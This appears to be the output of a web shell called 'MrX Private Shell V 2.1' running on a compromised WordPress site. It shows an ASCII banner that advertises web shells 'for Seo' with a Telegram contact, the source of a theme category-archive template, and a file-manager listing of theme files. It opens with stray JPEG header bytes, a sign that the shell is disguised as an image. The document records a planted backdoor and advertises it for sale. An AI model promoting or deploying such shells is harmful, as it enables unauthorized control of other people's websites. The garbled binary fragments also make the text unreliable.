����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
?>
<h2 id="category-title" class="archive-title">
<?php printf(__('%s', 'pmthemes'), '<span>' . single_cat_title( '', false ) . '</span>'); ?>
</h2>
<?php
$categories = get_the_category();
$category_id = $categories[0]->cat_ID;
$my_query = new WP_Query( array( 'cat' => $category_id, 'showposts' => 1, 'ignore_sticky_posts' => 1 ) );
while ( $my_query->have_posts() ) : $my_query->the_post();
$do_not_duplicate = $post->ID; ?>
<h3 class="vid-title"><?php the_title(); ?></h3>
<div class="entry clearfix">
<?php the_content(); ?>
</div>
<?php endwhile; ?>
<div class="clearfix"></div>
<div class="related-posts-grid">
<div class="related-posts-columns related-posts-three-columns clearfix">
<?php if ( have_posts() ) : while ( have_posts() ) : the_post();
if ( $post->ID == $do_not_duplicate ) continue; ?>
<div class="related-post-column clearfix">
<a href="<?php the_permalink() ?>" title="<?php echo esc_attr(get_the_title() ? get_the_title() : get_the_ID()); ?>">
<?php the_post_thumbnail('featured_image'); ?>
<p class="play"></p></a>
<header class="entry-header">
<?php the_title( sprintf( '<h4 class="entry-title"><a href="%s" rel="bookmark">', esc_url( get_permalink() ) ), '</a></h4>' ); ?>
</header>
</div>
<?php endwhile; endif; ?>
</div>
</div>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| content-excerpt.php | File | 563 B | 0644 |
|
| content-fullpost.php | File | 431 B | 0644 |
|
| content-page.php | File | 378 B | 0644 |
|
| content-product.php | File | 1.59 KB | 0644 |
|
| content-search.php | File | 541 B | 0644 |
|
| content-single.php | File | 762 B | 0644 |
|
| content-video.php | File | 1.53 KB | 0644 |
|
| content.php | File | 616 B | 0644 |
|
| featured-content-slider.php | File | 2.26 KB | 0644 |
|
| main-navigation.php | File | 1.13 KB | 0644 |
|
| news-ticker.php | File | 1.71 KB | 0644 |
|
| top-bar.php | File | 678 B | 0644 |
|
| top-navigation.php | File | 1.41 KB | 0644 |
|